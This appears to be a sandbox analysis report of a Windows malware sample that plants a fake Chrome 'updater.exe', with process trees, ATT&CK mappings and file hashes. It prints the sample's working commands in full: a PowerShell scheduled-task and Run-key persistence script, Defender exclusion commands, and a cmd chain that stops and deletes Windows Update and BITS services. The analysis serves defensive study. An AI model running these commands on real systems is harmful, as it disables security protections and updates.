PID 1292 wrote to memory of 1528	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1528	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1556	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 1556	1292	cmd.exe	reg.exe
PID 3244 wrote to memory of 1424	3244	powershell.exe	schtasks.exe
PID 3244 wrote to memory of 1424	3244	powershell.exe	schtasks.exe
PID 4816 wrote to memory of 4188	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 4188	4816	cmd.exe	sc.exe
PID 1520 wrote to memory of 4584	1520	cmd.exe	powercfg.exe
PID 1520 wrote to memory of 4584	1520	cmd.exe	powercfg.exe
PID 4816 wrote to memory of 2840	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 2840	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 3904	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 3904	4816	cmd.exe	sc.exe
PID 1520 wrote to memory of 3744	1520	cmd.exe	powercfg.exe
PID 1520 wrote to memory of 3744	1520	cmd.exe	powercfg.exe
PID 4816 wrote to memory of 1040	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 1040	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 4192	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 4192	4816	cmd.exe	sc.exe
PID 4816 wrote to memory of 4808	4816	cmd.exe	reg.exe
PID 4816 wrote to memory of 4808	4816	cmd.exe	reg.exe
PID 1520 wrote to memory of 2692	1520	cmd.exe	powercfg.exe
PID 1520 wrote to memory of 2692	1520	cmd.exe	powercfg.exe
PID 4816 wrote to memory of 4172	4816	cmd.exe	reg.exe
PID 4816 wrote to memory of 4172	4816	cmd.exe	reg.exe
PID 4816 wrote to memory of 4456	4816	cmd.exe	reg.exe
PID 4816 wrote to memory of 4456	4816	cmd.exe	reg.exe
PID 1520 wrote to memory of 740	1520	cmd.exe	powercfg.exe
PID 1520 wrote to memory of 740	1520	cmd.exe	powercfg.exe
PID 4816 wrote to memory of 2864	4816	cmd.exe	reg.exe
PID 4816 wrote to memory of 2864	4816	cmd.exe	reg.exe
PID 4816 wrote to memory of 2348	4816	cmd.exe	reg.exe
PID 4816 wrote to memory of 2348	4816	cmd.exe	reg.exe
PID 3768 wrote to memory of 3460	3768	updater.exe	conhost.exe
PID 1556 wrote to memory of 316	1556	cmd.exe	WMIC.exe
PID 1556 wrote to memory of 316	1556	cmd.exe	WMIC.exe
PID 3768 wrote to memory of 3696	3768	updater.exe	conhost.exe
PID 4668 wrote to memory of 3668	4668	cmd.exe	sc.exe
PID 4668 wrote to memory of 3668	4668	cmd.exe	sc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3164

C:\Users\Admin\AppData\Local\Temp\testing.exe
"C:\Users\Admin\AppData\Local\Temp\testing.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4028

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3528

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4856

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4084

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5084

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4516

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4908

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1444

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:2236

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1528

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1556

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4756

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4232

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:620

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mibqiuc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3196

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4188

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2840

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3904

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1040

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4192

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4808

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4172

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:4456

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2864

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:2348

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4584

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:3744

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:2692

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4476

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe piwxkhozdwrizr
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3460

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:316

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:4824

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ajhvfdbttvpjvzel 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUDVw9rZbme/VWRaCGMVy5A4KWmOYusR4Ik0iMHdgwpNOcjbYY5GHdN0CGOwXnubuj1k8SXyOPHLg/wcO08HTPQBCprXvYsSFocqjzqXvCOk3makNm0IivIoZ1KZt2YxT6Ci+BE7B/M5vRdKOrAlIyiTLPowHv2xwlgKELrnhNzBo4cDejdbTidr1qPNdTi4IwjcYnuD1ZGEEk854175l0vqhgS0J4NKy9OfqC4ZDiL7DMzbXsHZBHh2Jw55sStIs/MAZNnhxYjBZpkoZpwPghg6VnLEX8RYirlFk+ArUNG/2+FGzSRQ3kSkHyDV437Fza
2⤵
PID:3696

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:656

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Program Files\Google\Libs\g.log
2⤵
PID:4992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:1876

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5100

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4712

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:2864

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4232

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:4400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thaqo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
PID:4420

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4668

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3668

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3540

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1748

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:988

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5048

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2660

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2228

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:2376

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1624

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1104

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1028

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
PID:4900

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4048

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4048.0.1493486023\1887178082" -parentBuildID 20221007134813 -prefsHandle 1860 -prefMapHandle 1852 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e0aa96b-31c1-42da-9c76-b363a4738f18} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" 1932 1960c617458 gpu
4⤵
PID:2120

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4048.1.41844028\968091170" -parentBuildID 20221007134813 -prefsHandle 2320 -prefMapHandle 2316 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {246a3a7b-9013-4857-9a07-77a2cf5b2452} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" 2332 1960b30d158 socket
4⤵
PID:3868

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4048.2.536273016\60552649" -childID 1 -isForBrowser -prefsHandle 2852 -prefMapHandle 2952 -prefsLen 21074 -prefMapSize 232675 -jsInitHandle 1420 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {403a2ed7-cd67-40f8-98ac-52ee1eef2c04} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" 2892 1960f3f8b58 tab
4⤵
PID:3656

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4048.3.956307707\632859357" -childID 2 -isForBrowser -prefsHandle 3500 -prefMapHandle 3472 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1420 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e35d2c54-e943-42bf-aa3c-59d642fa08ed} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" 3512 1967e35e558 tab
4⤵
PID:4564

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4048.4.200203902\1183405138" -childID 3 -isForBrowser -prefsHandle 4592 -prefMapHandle 4612 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1420 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b2705b6-aad6-4a2e-8e76-84649ff152c1} 4048 "\\.\pipe\gecko-crash-server-pipe.4048" 4628 1961159ef58 tab
4⤵
PID:4740

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
PID:2096

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3240

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.1MB

MD5
a12bc9557ad889a49e7b4f970c78dda8

SHA1
5383b8e6d09d41384281b95f9ccc8e050e7c04fa

SHA256
9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

SHA512
be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.1MB

MD5
a12bc9557ad889a49e7b4f970c78dda8

SHA1
5383b8e6d09d41384281b95f9ccc8e050e7c04fa

SHA256
9940b1f8deb931e431dded69a71e6c9ac4c9e7d4fa560932f92cf0ae94cc65e0

SHA512
be8ca69b115aea7382ad4a780a0452a0df986bb036aec0aea3cac9f4b0d598c4256f0732720a5ee83fc05cd7dac7adf545792f91f2b60a05027a1811f12000ee

Download Submit
C:\Program Files\Google\Libs\WR64.sys
Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
3a6bad9528f8e23fb5c77fbd81fa28e8

SHA1
f127317c3bc6407f536c0f0600dcbcf1aabfba36

SHA256
986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

SHA512
846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
cd7bc20a2d198c263f7a230f66534fc0

SHA1
410b72bb3de1147dbfa07fb3dc765f2c3773b464

SHA256
957ba84fa4551f0ba432f1bb6a23660c39e209d96f215879bff6cf5fade743aa

SHA512
68dda51f4a3a75e6f6b20565f4911a7c1cf07aa641489777cb5774b64017883a8f9f58aa1e359b0bb1ca9a514876ac7e51579732b48b9f81eb15de6fa98c6edc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8f954c86495f1256b9f20046a0b487d3

SHA1
b40ac4b22b07611c5c34efedca97fc5a8319e9b7

SHA256
94cf031ea1a632617548db0089091413f4cbb71ce2048e0aab92f6866ab8306b

SHA512
f67333df900d13eef6e01ca6fd2e52efe20a5c85ee6ce43d67f55ef913049149df696e045f45dc614d564afa4b457b365b915dd720b9da369b089ac9cb9b6cea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
4d427da8bbc5856f496910fd8b85a761

SHA1
62d5853635aa30e95eacceb87ef75e64f8a76d00

SHA256
a5042f61c3dc73e16af8e84ce49c339e5520d8294396dbbca4768555255c60f7

SHA512
4265654cbdbe19fdd3a6091792d1c54076d5a22569230cb75455ebc8b03be53b40439fb86462a7411411482dd7aace60ae3103143eb68be357f0c1b26d773160

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bozzcyfh.default-release\activity-stream.discovery_stream.json.tmp
Filesize
147KB

MD5
49d88674c93815e87b6c2d2f6ba55435

SHA1
772b33ff4a04483971ac38e81c5ae2a9a862fad8

SHA256
1ae3cbf5fe263c268b52e898c4daeb269cb7209e8951be9b02ce008a5a550edb

SHA512
b7d8f07bf04fa330bd205c9e0784ad260cb0931b3614a2336f2ef70015bbb89b063e3d03f1fdd3160b364d4ad5e06d2d6eb383e14c17378df7b0e758c4f4a7c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dinytsng.ocv.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bozzcyfh.default-release\prefs-1.js
Filesize
6KB

MD5
6fc94ce59e6ef76649d9b72e58d5aad1

SHA1
1649dd4eb19a522b6c3d5131b0c9f578d441e4ee

SHA256
74696ceba4d4420e1451f7c5df448c651a123b59a30922d132872984c17aee4e

SHA512
3834a385fad2c7776705f92b72f3289bb6588d4b26e58379f2916f20411313c5855634a13e31a4b1a8fc2f0f505e6446d3f32227a4d92532b6eb5806f40c47f7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bozzcyfh.default-release\prefs-1.js
Filesize
6KB

MD5
a96be4456f962b341bbaacde81d50ea5

SHA1
a8ca495f77ed83922d571cfe2f113aa14493a2b7

SHA256
bbf29390423476b0074392f0c17a7cceede3331bbe8fb531b6108b93481643dd

SHA512
88dd47055b45162555c7095024cf2fa07b3ce5c61830f985287b93a8898687335ff32fe3a6a3a1b1ed2db85ff45f6f67f8b62c107a58f82859b2fd3b093ddd51

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bozzcyfh.default-release\prefs-1.js
Filesize
6KB

MD5
1d1388f170af99a9551823f5dc0d5ed0

SHA1
842a8acf8b6c1c854c2c888403884bcf82ecb208

SHA256
1708310fc2ec1689209983a71f8562fad27a8c8e74c4f3d34d30287df600766b

SHA512
